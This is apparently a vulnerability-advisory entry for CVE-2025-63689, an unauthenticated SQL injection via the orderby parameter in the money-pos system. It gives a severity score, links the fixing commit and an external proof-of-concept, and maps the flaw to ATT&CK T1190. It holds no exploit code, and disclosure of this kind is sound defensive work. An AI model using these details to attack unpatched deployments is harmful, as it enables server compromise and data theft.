CVE-2025-63689
Published: 07 November 2025
Description
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
Security Summary
CVE-2025-63689 is a set of multiple SQL injection vulnerabilities (CWE-89) affecting the ycf1998 money-pos system prior to commit 11f276bd20a41f089298d804e43cb1c39d041e59, released on 2025-09-14. These flaws allow a remote attacker to execute arbitrary code by exploiting the orderby parameter. The vulnerability carries a CVSS v3.1 base score of 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H), indicating critical severity due to its network accessibility, low attack complexity, lack of required privileges or user interaction, and potential for scope change with high impacts across confidentiality, integrity, and availability.
Any unauthenticated remote attacker can exploit this vulnerability over the network with minimal effort. Successful exploitation enables arbitrary code execution on the affected system, potentially leading to full server compromise, data exfiltration, or further lateral movement within the environment.
Mitigation is available via the patching commit at https://github.com/ycf1998/money-pos/commit/11f276bd20a41f089298d804e43cb1c39d041e59. Additional details, including a proof-of-concept, are documented in the GitHub issue at https://github.com/ycf1998/money-pos/issues/3 and a related gist at https://gist.github.com/LockeTom/2ed0f3751c88542f48b7c230468d2a46. Security practitioners should verify and apply the update immediately on affected deployments.
Details
- CWE(s)
Affected Products
MITRE ATT&CK Enterprise Techniques
Why these techniques?
The SQL injection vulnerability in a public-facing web application (money-pos system) allows unauthenticated remote attackers to achieve arbitrary code execution, directly mapping to T1190: Exploit Public-Facing Application.